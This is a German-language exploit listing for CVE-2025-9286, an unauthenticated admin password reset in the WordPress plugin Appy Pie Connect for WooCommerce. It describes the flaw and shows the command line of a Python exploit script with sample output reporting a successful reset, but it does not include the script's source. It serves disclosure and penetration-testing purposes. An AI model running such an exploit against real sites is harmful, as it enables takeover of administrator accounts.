
Appy Pie Connect for WooCommerce <= 1.1.2 - Fehlende Autorisierung zu nicht authentifizierter Privilegienerweiterung
Appy Pie Connect for WooCommerce <= 1.1.2 - Fehlende Autorisierung zu nicht authentifizierter Privilegienerweiterung
Das Plugin Appy Pie Connect for WooCommerce für WordPress ist aufgrund fehlender Autorisierung innerhalb des REST-Handlers reset_user_password() in allen Versionen bis einschließlich 1.1.2 anfällig für Privilegienerweiterung.
Dadurch ist es nicht authentifizierten Angreifern möglich, das Passwort beliebiger Benutzer, einschließlich Administratoren, zurückzusetzen und so administrativen Zugriff zu erlangen.
Das folgende Exploit kann verwendet werden, um CVE-2025-9286 gegen WordPress-Sites auszunutzen, auf denen die verwundbare Plugin-Version läuft.
Skriptname: CVE-2025-9286.py
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.
Dieses Exploit ist ausschließlich für Bildungs- und autorisierte Penetrationstestzwecke bestimmt.
Eine unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Von: Khaled Alenazi (Nxploited)